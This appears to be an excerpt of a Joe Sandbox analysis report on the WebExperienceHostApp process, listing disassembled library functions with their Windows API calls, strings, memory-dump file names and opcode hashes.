API ID: AddressErrorInfoProc
String ID: RoOriginateLanguageException$combase.dll
API String ID: 4049917127-3996158991
Opcode ID: 7466db823831db908e735f918de8e8c27db00bf53b94701007ad3cb2b1cff79f
Instruction ID: 26e712ad6a079a120bfab263015d37cb418d5ed27a6b68628ae72dea27849188
Opcode Fuzzy Hash: 7466db823831db908e735f918de8e8c27db00bf53b94701007ad3cb2b1cff79f
Instruction Fuzzy Hash: 24314822F15E1698FF009F65DA413B92360BB4CBACF404936DE0D966A5DF3CE564C340

Function 00007FF619497900 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF619497983
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF61949799A

Strings

kernelbase.dll, xrefs: 00007FF61949797C
WilFailureNotifyWatchers, xrefs: 00007FF619497990

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: WilFailureNotifyWatchers$kernelbase.dll
API String ID: 1646373207-2571501353
Opcode ID: 9a7db6e43057bd728f2ef62b898599da06f6ef90415e870cb48878db2bb90548
Instruction ID: 3cb3e54825eb03b18889e30e1b922e1c330ac845c6d0232d6075916b3dc7e062
Opcode Fuzzy Hash: 9a7db6e43057bd728f2ef62b898599da06f6ef90415e870cb48878db2bb90548
Instruction Fuzzy Hash: BB310E32919B8185EB64CF19A55513A77A0FB4DB68B14403AEA8E82764EF3CE554C700

Function 00007FFE007AA3C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE007AA3F2
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE007AA423
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007AA442

Strings

., xrefs: 00007FFE007AA3FC

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: FileFindNext$wcscpy_s
String ID: .
API String ID: 544952861-248832578
Opcode ID: e8055660fd5f3a0e6e4367fb8295474a2c920e569d81a9d24aaffc670c06c300
Instruction ID: cb982e6c415382cae301d929d96ad8b1589e34aace91dc174a4a8ca2fa9d07cc
Opcode Fuzzy Hash: e8055660fd5f3a0e6e4367fb8295474a2c920e569d81a9d24aaffc670c06c300
Instruction Fuzzy Hash: 3521A462A0D6C291EA70AB25E8483B923A0EB89784F484131FB9D437A8DF7CD445CB01

Function 00007FFE007A6BB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007A6C62
std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007A6CA5
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007A6CB6

Strings

ios_base::badbit set, xrefs: 00007FFE007A6C40, 00007FFE007A6C6D

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$std::ios_base::failure::failure
String ID: ios_base::badbit set
API String ID: 1099746521-3882152299
Opcode ID: a934e826d32ede37d3e5b424d5656a2318ae423a750d11c43174206a3af171af
Instruction ID: 8c387dbfba6320e65f587089b89c381b494e0910d9a02fc6da08c3eff1d14c74
Opcode Fuzzy Hash: a934e826d32ede37d3e5b424d5656a2318ae423a750d11c43174206a3af171af
Instruction Fuzzy Hash: CD012662E6F60791F718FA15D8415B91212EFC1758F2C8035E74E06BBEDE3DF6068250

Function 00007FFE007B32B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFE007B328D,?,?,?,00007FFE007B2D03), ref: 00007FFE007B32D3
InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFE007B328D,?,?,?,00007FFE007B2D03), ref: 00007FFE007B32F1
InitializeSRWLock.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFE007B328D,?,?,?,00007FFE007B2D03), ref: 00007FFE007B3308

Strings

p/{, xrefs: 00007FFE007B32DA

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Initialize$CriticalLockSectionabort
String ID: p/{
API String ID: 2361494507-2121998747
Opcode ID: 3ed5763ba69d27d0247f70d39b1130e6a6c23cb5fde608632177a057e24d302c
Instruction ID: 41e62ae88a99b0e62587f02f257fbc5f68e4ce393b0aceb2a864b5cf64b946c8
Opcode Fuzzy Hash: 3ed5763ba69d27d0247f70d39b1130e6a6c23cb5fde608632177a057e24d302c
Instruction Fuzzy Hash: E3018B72A09A0282EB58AF24E49427833A0FF49B14F5C4134C71E467BCDE3CD984C700

Function 00007FFE1A452410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45244E

Strings

RCC, xrefs: 00007FFE1A452420
csm, xrefs: 00007FFE1A452430
MOC, xrefs: 00007FFE1A452428

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: 47db328f9ad3fe6785f7c33411a4be44342857283f86d96f95ada9c86e643c8e
Instruction ID: 797d5aa27f1626aa25386db546433e184fb962d72b480184eb4da02d57c51b89
Opcode Fuzzy Hash: 47db328f9ad3fe6785f7c33411a4be44342857283f86d96f95ada9c86e643c8e
Instruction Fuzzy Hash: FDF04FB6B18A4681E7506F26E18107D76B5EB48F64F1950F3D74807272CF3CE8B0CA41

Function 00007FF619498800 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF61949881F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF61949882F

Strings

kernelbase.dll, xrefs: 00007FF619498815
RaiseFailFastException, xrefs: 00007FF619498828

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RaiseFailFastException$kernelbase.dll
API String ID: 1646373207-919018592
Opcode ID: 9cee964bd7aab848cc37a03405ac079c2a0f27fdeb4b8e053aa243852f3d0080
Instruction ID: e457aa214369c4182a64bdba6d349628ac20ddcc4e21b618a048ef6df4776716
Opcode Fuzzy Hash: 9cee964bd7aab848cc37a03405ac079c2a0f27fdeb4b8e053aa243852f3d0080
Instruction Fuzzy Hash: C7F01C25B18A9181EE148F17FA844296761BF4CFD8B445435EA5E87B28CE2CD461C700

Function 00007FFE1A4599DC Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C17D
Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C1B6
Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C4E3

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459B37
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459B96
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459BC8
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459BD8

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: e0e856a0689efcaa77ef655b2ee01dfdabc08d004ac59cec928a27a07a1ba9ac
Instruction ID: 1ba7dcb8df4709f7212e2c33249e8952785211b7bd5b877415bcdda4f9431208
Opcode Fuzzy Hash: e0e856a0689efcaa77ef655b2ee01dfdabc08d004ac59cec928a27a07a1ba9ac
Instruction Fuzzy Hash: D0918DA6F08A9289FB119B62D8403BC37B1BB06B24F5440F7DE4D576A6DF7CA855C340

Function 00007FFE1A45A16C Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A21E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A22E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A24B

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: db26575aafbf47d1ebfcb41f0a44ab5eea3fe5a11d01272e410fccac97833c0a
Instruction ID: 89297acb43f5c95b6e16d7166cdeda710c2e42c79581bb1cc3541298b863eede
Opcode Fuzzy Hash: db26575aafbf47d1ebfcb41f0a44ab5eea3fe5a11d01272e410fccac97833c0a
Instruction Fuzzy Hash: EC516AB2B18F5699E7119F62E8543BC77B0AB48F68F4440B2DA0D077A9DF3D9464C700

Function 00007FFE007B74F8 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFE007B6EF1), ref: 00007FFE007B75D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFE007B6EF1), ref: 00007FFE007B762B
memcpy.VCRUNTIME140_APP(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFE007B6EF1), ref: 00007FFE007B7635
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE007B7679

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 6a3fb9a081d1040bcb31cb8976ecef3be5baf333ccd0691446595d407ef7610f
Instruction ID: 3b4c39cfda6fefe1dc0c132530aff4497d32350d4fce2ed4c845c90e18bd8649
Opcode Fuzzy Hash: 6a3fb9a081d1040bcb31cb8976ecef3be5baf333ccd0691446595d407ef7610f
Instruction Fuzzy Hash: 2D41C161B0AA5691EE18EB16E5042796355FF84BE4F584631EF2D0BBEDEE7CE052C300

Function 00007FFE007D0818 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

_FXp_setw.LIBCPMT ref: 00007FFE007D0877
_FXp_movx.LIBCPMT ref: 00007FFE007D0887

Part of subcall function 00007FFE007D1064: memcpy.VCRUNTIME140_APP(?,?,00000004,00007FFE007D088C), ref: 00007FFE007D107A

Part of subcall function 00007FFE007D0FEC: ldexp.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,00007FFE007D089C), ref: 00007FFE007D1020

_FXp_movx.LIBCPMT ref: 00007FFE007D08CE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007D0947

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_movx$Xp_setw_errnoldexpmemcpy
String ID:
API String ID: 2233944734-0
Opcode ID: 5f6e89d24b1cfb7bdbc1a0da2f84e74a13c0c09dfe02f17bd2c73ce5df9fcb8a
Instruction ID: 6a953200b460587bf0904e002f58ef97bed9d52c8c698ddcd7f3a74871414d97
Opcode Fuzzy Hash: 5f6e89d24b1cfb7bdbc1a0da2f84e74a13c0c09dfe02f17bd2c73ce5df9fcb8a
Instruction Fuzzy Hash: D441D822A1DA8696F611BB2690513B96370BF88740F5C5232EBCD133BEDF3CF5068680

Function 00007FFE007A3110 Relevance: 6.1, APIs: 4, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007A312D
___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007A3137
islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A3174
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007A31CE

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcislower
String ID:
API String ID: 2234106055-0
Opcode ID: ba68687bd1084c1fd20868618680cfa2efd6f955821d8f547e74609adf00972e
Instruction ID: b92ab994286850b7318e9353d98be1d38556df9014dc685a83f5c2237c52e724
Opcode Fuzzy Hash: ba68687bd1084c1fd20868618680cfa2efd6f955821d8f547e74609adf00972e
Instruction Fuzzy Hash: 9631A062A0EB4582F711AF16E85027DAAA1FBC5B91F1C4035FB89077ADDE3CE585C710

Function 00007FFE007A2FD0 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007A2FE7
___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007A2FF1
isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A3027
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007A3087

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcisupper
String ID:
API String ID: 3857474680-0
Opcode ID: 23ab1e88ae2b3b9f22ff4d2e2df039963f5cd33ef94b97e970288bced12dc4c5
Instruction ID: 5b07caee5e98f8fc9f59a29d1df94b55fcd66f937006a6c8fd06ace4f21d1aed
Opcode Fuzzy Hash: 23ab1e88ae2b3b9f22ff4d2e2df039963f5cd33ef94b97e970288bced12dc4c5
Instruction Fuzzy Hash: D731D562A0D74182F7159F15D85037E6AA2EBD1B91F1C4035FB89077ADDE3CE685C710

Function 00007FFE007A9F60 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007A9CD0: CreateFile2.API-MS-WIN-CORE-FILE-L1-2-0 ref: 00007FFE007A9D00

GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FFE007A9FCB
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFE007A9FDA
GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FFE007AA00D
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFE007AA01C

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Handle$CloseFileInformation$CreateFile2
String ID:
API String ID: 1163284826-0
Opcode ID: c98a8f08e21ed10e916e511ab44b33d144b6336d3769b1fd7808e17c69bf46a3
Instruction ID: d47983d574762775d15ceafa0dd0111032b07552524b6e90e1d77d7d3c7f6688
Opcode Fuzzy Hash: c98a8f08e21ed10e916e511ab44b33d144b6336d3769b1fd7808e17c69bf46a3
Instruction Fuzzy Hash: BF31D622B05A1689F750EB71D4406BE27A0AB55BA8F488735DF2D177E8DF3CA4958340

Function 00007FFE1A45C5A8 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A45E098: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A45E0F2

Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C17D
Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C1B6
Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C4E3

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C626
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C635
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C6B2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C6C1

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID:
API String ID: 3863519203-0
Opcode ID: 137f35b8ab8777edeeea4d3d93e268a54653f94e00eb99c599d23a709cf02532
Instruction ID: f9fb18d9650736d42911e11b2b18a1fd0dab4d7b8357e33c7fee24c7f6095b81
Opcode Fuzzy Hash: 137f35b8ab8777edeeea4d3d93e268a54653f94e00eb99c599d23a709cf02532
Instruction Fuzzy Hash: 414166B2B08B4199EB01DF66E8803BC77B0BB48B58F9481B6EA4D57769DF3C9561C700

Function 00007FFE007DB9C0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,00000000,?,?,?,00007FFE007CF441), ref: 00007FFE007DBA07
memcpy.VCRUNTIME140_APP(?,00000000,?,?,?,00007FFE007CF441), ref: 00007FFE007DBA2B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00007FFE007CF441), ref: 00007FFE007DBA38
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00007FFE007CF441), ref: 00007FFE007DBAAB

Part of subcall function 00007FFE007A2E70: wcsnlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A2E9A
Part of subcall function 00007FFE007A2E70: LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007A2EDE

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: String___lc_locale_name_funcfreemallocmemcpywcsnlen
String ID:
API String ID: 2888714520-0
Opcode ID: f175193b6c3cb69a186ef12907c31e75d148df82e888f905f451e463fc05ba55
Instruction ID: 2fd9f9673f1a799eb658a35eb92221fcf80b5feca5246ef7f9741c776c83f2a9
Opcode Fuzzy Hash: f175193b6c3cb69a186ef12907c31e75d148df82e888f905f451e463fc05ba55
Instruction Fuzzy Hash: BC21EB2171AA91C5D620AF16A8005396BA4FF85BE4F5D4231DF99177F8DF3CD4418740

Function 00007FFE007AA920 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

_fsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AA9C1
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AA9CF
_fsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AAA00
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AAA1B

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _fsopen$fclosefseek
String ID:
API String ID: 410343947-0
Opcode ID: f64390f3235c326aca300763c1886b7c3d144e41e05b7a6f6191a3c4a7674b13
Instruction ID: 680999f8df403c745e13afec54721a9ccc0f19ec04197f42e5fa765ef7f0ce21
Opcode Fuzzy Hash: f64390f3235c326aca300763c1886b7c3d144e41e05b7a6f6191a3c4a7674b13
Instruction Fuzzy Hash: 7421B121B2AB0255EB69AB16A4547366692BFC9F84F0D5138DF4E437B8DF3CE845C300

Function 00007FFE007AAA30 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

